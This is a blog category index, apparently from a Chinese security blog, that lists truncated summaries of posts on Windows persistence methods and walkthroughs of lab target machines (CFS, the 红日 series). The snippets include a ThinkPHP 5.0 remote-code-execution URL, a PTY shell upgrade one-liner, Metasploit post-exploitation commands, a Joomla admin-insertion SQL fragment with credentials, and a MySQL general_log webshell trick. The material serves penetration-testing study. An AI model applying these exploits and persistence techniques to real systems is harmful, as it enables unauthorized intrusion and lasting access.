随笔分类 -  内网

windows权限维持
摘要:一 注册表 二 计划任务 三 服务 四 影子账户和激活guest 五 快捷键位 六 镜像劫持 七 屏幕保护程序 八 dll劫持 九 wmi后门 一、注册表 打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下新建一个开 阅读全文
posted @ 2021-08-14 00:20 bingtanghulu 阅读(322) 评论(0) 推荐(0)
CFS靶机
摘要:nmap扫描 nmap -sV -p1-65535 192.168.1.135 thinkphp5.0版本 找到poc进行测试 http://192.168.1.135/index.php?s=index/\think\app/invokefunction&function=call_user_fu 阅读全文
posted @ 2020-08-28 13:23 bingtanghulu 阅读(486) 评论(0) 推荐(0)
红日靶机五
摘要:一、信息收集 cms扫描 端口扫描 目录扫描 输入错误路径,发现是5.0.22版本 查找poc 命令执行 插入木马 http://192.168.62.128?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0 阅读全文
posted @ 2020-08-23 13:37 bingtanghulu 阅读(240) 评论(0) 推荐(0)
红日靶机四
摘要:信息收集 2001端口 2002端口 抓包修改为PUT请求,上传木马,前面加/ python -c 'import pty; pty.spawn("/bin/bash")' 添加代理 个人原因 重置 kali IP地址改为 192.168.1.128 centos IP地址为192.168.1.13 阅读全文
posted @ 2020-08-23 13:36 bingtanghulu 阅读(163) 评论(0) 推荐(0)
红日靶机三
摘要:信息收集 testuser / cvcvgjASD!@ 爆破失败 登录数据成功 joomlaCMS公开漏洞 mysql -uroot -p123 -h 192.168.1.110 INSERT INTO `am2zu_users`(`name`, `username`, `password`, `p 阅读全文
posted @ 2020-08-23 13:35 bingtanghulu 阅读(193) 评论(0) 推荐(0)
红日靶机二
摘要:信息收集 失败了 换一个漏洞 木马上传 meterpreter > background msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_ex 阅读全文
posted @ 2020-08-23 13:34 bingtanghulu 阅读(220) 评论(0) 推荐(0)
红日靶机一
摘要:一、获取shell show variables like '%general%'; #查看日志状态 当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。SE 阅读全文
posted @ 2020-08-23 13:33 bingtanghulu 阅读(262) 评论(0) 推荐(0)